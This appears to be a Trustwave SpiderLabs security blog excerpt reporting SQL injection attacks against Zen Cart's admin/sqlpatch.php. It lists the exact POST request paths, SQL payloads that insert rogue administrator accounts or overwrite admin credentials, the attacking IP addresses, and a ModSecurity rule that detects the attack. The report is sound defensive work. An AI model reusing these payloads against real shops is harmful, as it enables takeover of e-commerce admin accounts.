Trustwave and Cybereason Merge to Form Global MDR Powerhouse for Unparalleled Cybersecurity Value. Learn More
Get access to immediate incident response assistance.
Get access to immediate incident response assistance.
Trustwave and Cybereason Merge to Form Global MDR Powerhouse for Unparalleled Cybersecurity Value. Learn More
The attacks send a POST request to the following URLs:
POST /admin/sqlpatch.php/password_forgotten.php?action=execute
POST /black_market/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /cart/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /product_info.php/products_id/1658/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /shop/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /shopping/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /store/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /tienda/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /tradeshow/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /zencart/admin/sqlpatch.php/password_forgotten.php?action=execute
The attacks include a POST payload parameter called "query_string" that included the following different payloads:
insert into `admin` ( `admin_id`, `admin_name`, `admin_email`, `admin_pass`, `admin_level` ) values ( '2112', 'jembot', 'adm.net', 'abc22a464d79887aeb11486b74081fb5:3d', '0' );'
insert into admin (admin_id, admin_name, admin_email, admin_pass) values (666, 'nobody', 'crew.tools43@yahoo.com', '21232f297a57a5a743894a0e4a801fc3:be');'
insert into admin values (12, 'sales', 'admin@localhost', '351683ea4e19efe34874b501fdbf9792:9b', 1);'
show tables;'
update admin set admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' where admin_id='1';'
As you can see, the attacker(s) are attempting to add in new user account data to the "admin" group within the back-end Zen Cart DB.
There were a total of 116 attack requests detected from 4 source IP addresses:
125.165.165.31
173.230.128.50
193.107.86.145
209.239.114.225
These attacks are identified by the following ModSecurity rule from our SpiderLabs Commercial Rules Feed which identifies SQL Injection attacks against this Zen Cart vulnerability:
## (2055343) ModSecurity Rules from Trustwave SpiderLabs: Zen Cart admin/sqlpatch.php query_string Parameter SQL Injection#SecRule REQUEST_LINE "@contains admin/sqlpatch.php" "chain,phase:2,block,rev:'031312',t:none,t:urlDecodeUni,capture,logdata:'%{args.query_string}',severity:'2',id:2055343,msg:'SLR: Zen Cart admin/sqlpatch.php query_string Parameter SQL Injection',tag:'WEB_ATTACK/SQL_INJECTION',tag:'http://osvdb.org/show/osvdb/55343'" SecRule "ARGS:query_string" "@pm # \" /* */ ` ' ( ) ; --" "ctl:auditLogParts=+E"
Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.
Copyright © 2024 Trustwave Holdings, Inc. All rights reserved.